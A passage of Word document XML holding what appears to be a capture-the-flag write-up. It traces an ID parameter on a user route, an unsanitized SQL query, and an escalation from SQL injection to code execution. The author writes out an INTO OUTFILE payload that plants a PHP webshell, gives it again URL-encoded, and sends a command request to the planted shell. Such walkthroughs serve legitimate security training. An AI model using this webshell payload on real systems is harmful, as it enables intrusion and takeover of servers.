          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ID)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will be passed in the query. As we can see, it will return the response in JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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3784600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3784600"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we go back to the site and access the new route </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_ul/usuarios/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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Here I will pass the ID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and as we can see, it returns the first user from the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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294175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="53322" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2294175"/>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Changing the ID to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we obtain our first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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313987"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="43106" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2313987"/>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Analyzing the code, we can see that it is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since it is not performing any sanitization of the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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3784600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="81" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3784600"/>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable query: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM usuarios WHERE id=$data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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4292600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4292600"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.poag8iekhvyr" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation – SQLi to RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">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460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1460500"/>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By reviewing the code, we can open files located in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/classes/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> simply by sending a POST request with the file name (without </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.class</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and without </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">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Here, I will create a PHP webshell and write it to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/classes/{webshell_name}. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This way, we will be able to execute system commands.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.lrhycxkgezrh" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 UNION SELECT 1,"&lt;?php system($_GET['cmd']); ?&gt;" INTO OUTFILE '/var/www/html/classes/vert16x.class.php'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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Now we will URL-encode our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.urlencode.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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Our final payload will look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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/_ul/usuarios/3%20UNION%20SELECT%201%2C%22%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fclasses%2Fvert16x.class.php%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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1615059"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="78" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="37432" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1615059"/>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When sending it, the application will return </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which means it worked 😄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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Now we open </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to send the request via POST method, allowing command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2311400"/>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /_ul/vert16x?cmd=id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
